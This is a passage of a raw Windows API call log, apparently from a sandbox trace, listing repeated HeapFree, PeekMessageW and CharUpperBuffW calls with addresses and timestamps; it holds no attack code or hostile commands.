HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d9c0 | out: hHeap=0x25c0000) returned 1 [0255.034] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.034] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.034] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.034] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.034] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.035] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.035] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.036] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.036] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.036] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.037] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0255.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0255.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.040] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.040] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.040] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.041] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.041] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.041] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.041] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.042] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.042] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0255.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.044] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 